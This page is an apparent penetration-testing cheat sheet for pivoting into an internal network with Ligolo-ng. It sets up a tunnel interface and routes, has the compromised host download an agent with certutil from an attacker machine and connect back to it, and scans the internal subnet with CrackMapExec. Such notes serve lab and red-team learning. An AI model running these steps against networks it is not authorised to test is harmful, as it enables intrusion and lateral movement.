Basic Pivoting

Basic Pivoting with Ligolo-ng

Source:

https://github.com/nicocha30/ligolo-ng

Releases:

https://github.com/nicocha30/ligolo-ng/releases


Step 1: Install Ligolo-ng

  1. Download and Unzip Ligolo-ng: Follow the instructions from the Ligolo-ng GitHub repository to download and unzip the contents.


Step 2: Set Up the Interface

To create the interface for pivoting, you need to add a new TUN/TAP interface and bring it up.

  1. Delete Old Interfaces (if any):

    ip route list
    route del -net 10.0.0.0/24
  2. Add a New Interface:

    ip tuntap add user root mode tun ligolo
    ip link set ligolo up

    This creates the interface ligolo to route traffic through the tunnel.


Step 3: Get Help with Ligolo-ng

You can always get help or view available options by running:

./proxy -h

Step 4: Start the Proxy Server (Listening)

Start the proxy server with the self-cert option, which will listen for incoming connections:

./proxy -selfcert

Step 5: Move the Agent to the Target Machine

  1. On the target machine, use the following command to download the agent:

    certutil -urlcache -f http://192.168.45.241/agent.exe agent.exe
  2. Once the agent is downloaded, run it with the following command:

    .\agent.exe -connect 192.168.45.241:11601 -ignore-cert

    Here, you are connecting back to your Kali machine. Note: We're using a self-signed certificate, which is why the -ignore-cert option is included.


Step 6: View and Interact with Sessions

To view the active sessions, run the following in the terminal:

sessions

Choose the session by typing its number, for example, '1'. Once you are in the session, run:

ifconfig

This command shows the interfaces on the target machine, including the internal network machine, like 10.10.86.141/24.


Step 7: Add Routing to the Pivoting Interface

To route traffic through the tunnel (pivot), you need to add the target network to your routing table.

  1. Add a Route to access the internal network:

    ip route add 10.10.86.0/24 dev ligolo
  2. Verify the Route:

    You can check if Ligolo has added the route properly with:

    ip route list

Step 8: Final Step - Start the Pivoting Session

Now that the route is added, go back to your proxy server, ensure you're in the correct session, and start the proxy.

  1. Select Session:

    Choose the correct session by typing the number (e.g., '1').

    session
  2. Start Pivoting:

    Run the start command to begin the pivot.

    start

Step 9: Verify the Pivoting Setup

Now that the pivot is active, you can verify access to the internal network by using CrackMapExec to check if the internal machines are resolvable.

crackmapexec smb 10.10.86.0/24

If CrackMapExec can resolve the internal machines, the pivot is successful, and you now have access to the internal network.

Last updated